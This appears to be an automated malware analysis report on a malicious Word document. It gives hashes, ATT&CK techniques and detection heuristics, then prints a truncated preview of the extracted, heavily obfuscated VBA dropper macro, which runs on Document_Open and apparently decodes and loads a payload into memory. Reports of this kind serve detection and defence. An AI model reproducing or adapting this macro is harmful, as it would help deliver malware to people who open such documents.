Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4679b85d02d95cd7…

MALICIOUS

Office (OLE)

Size: 181.5 KB
Created: 2017-11-02 13:45:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: 33b161d7a3c850263d88671a90d4e0ae
SHA-1: 6bda457ef6fba3d11b8543e26c6b648a156df718
SHA-256: 4679b85d02d95cd7643e7c60b59443447caefaf910dc44b838adbd04135843c1
Risk Score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a large VBA macro. The macro is triggered by the Document_Open event, indicating an attempt to execute malicious code upon opening. The ClamAV detection name 'Doc.Dropper.Agent-6363555-0' suggests its function is to drop and execute a secondary payload. The presence of VBA macros and the Document_Open event strongly suggest a spearphishing attachment attack vector.

Heuristics (4)

  • ClamAV: Doc.Dropper.Agent-6363555-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6363555-0
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ - In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# - In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ - In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# - In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 41747 bytes
SHA-256: 59821482979a1e7a429634c449b816a0bb3c6bddbf97abea69955896b7f0caef

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub holcus()
Dim europa As Integer
Dim perianth As Variant
yellowlegs.thermally.Value = Day(#12/5/2013#)
varday = refluence = "gall"
pollster = "montfort"
annihilate = "camisade"
disconformity = "irreligious"
beatae = "arsonist"

allelic = anoint
lacewing = electrometer
Set clarification = yellowlegs.thermally.SelectedItem
bawn = 11
undated = 22862
falsus = 471308
 Pmt 0, bawn, 38648, 47302, 8

trio = clarification.Name
cordated = 5 - 127 + 7966
zoonosis = Right(trio, cordated)
loadstar = azodrak.moldboard(zoonosis)
ingeniosa = 56
decoyduck = 20758
lacy = 443491
 Pmt 0, ingeniosa, 13556, 19333, 8

glomerular = "doublechinned"
bunas = invigilation
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim immigrant As Variant
Dim collier As LongPtr
Dim maputo As LongPtr
Dim classfellow As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim lapwing As Variant
Dim maputo As Long
Dim cheapness As Integer
Dim collier As Long
#End If
amygdalus = 122 - 96 - 26
inbasket = "contrail"
contingency = 58 - 33 + 4071
unbloodied = 65
pudendal = 25540
kenyan = 251352
 Pmt 0, unbloodied, 29597, 53189, 3

dubitousness = "masonry"
harmonic = "incoordination"
lancer = becket
dismissal = 105
bantling = 28510
preconcerted = 475122
 Pmt 0, dismissal, 24406, 54982, 5

exarch = loadstar
offputting = "flannelette"
bedim = "dogear"
collier = balourdise(exarch)
bunker = "barony"
empale = levin
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim barbouillage As Long
Dim grimy As LongPtr
Dim stupefied As LongPtr
Dim malaysia As LongPtr
iterum = 98 - 101 + 2067
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim grimy As Long
bedwetting = 126 - 103 + 758
Dim stupefied As Long
Dim malaysia As Long
iterum = bedwetting + 3459

#End If
Dim unisonance As Variant
Dim firelighter As Integer
grimy = 14 - 128 + 114
maputo = collier + iterum
stupefied = 128 - 95 + 201494
malaysia = 105 - 78 + 3473
aglet = anoxic(stupefied, _
grimy, _
maputo, _
grimy, _
grimy, _
grimy, grimy)
entomophobia = 40 + 6
durum = 22230 + 9
paradoxurus = 301990 + 6
 Pmt 0, entomophobia, 25200, 35830, 7

End Sub

Function balourdise(girlish)
Dim anabiosis As Integer
Dim expounding As String
Dim butcher As String
Dim diplotene As Variant
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim perilla As Byte
Dim defensible As LongPtr
scissortail = 114 - 46 - 60
Dim headlong As LongPtr
Dim tuning As String
Dim bare As Integer
Dim louisville As LongPtr
Dim bagnio As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim defensible As Long
scissortail = 51 - 54 + 7
Dim headlong As Long
Dim louisville As Long
#End If
kitchen = VarPtr(defensible)
depression = mara(kitchen, VarPtr(girlish) + 8, scissortail)
morocco = 5 - 46 + 40
headlong = 59 - 118 + 59
chiroptera = 116 - 25 - 91
louisville = 16 - 59 + 9593
continuous = 31 - 32 + 4097
dandle = 9 - 94 + 149
calloused = lives(ByVal morocco, _
headlong, _
ByVal chiroptera, louisville, ByVal continuous, _
ByVal dandle)
boarfish = isometry - 456

isometry = isometry Or 494

mara headlong, defensible, 22 - 113 + 5974
ceux = 24
overcharge = 5353
meddle = 418939
 Pmt 0, ceux, 37355, 50999, 6

balourdise = headlong
End Function
Private Sub Document_Open()
Dim collectible As Integer
Dim keen As Byte
cyanamide = "za"
holcus
neverdying = 109
aplanatic = 12785
radiomicrometer = 313470
 Pmt 0, neverdying, 19161, 37219, 6
End Sub
Function mara(aegri, chichi, loser)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim sprinkle As String
Dim different As Variant
Dim lemonad
... (truncated)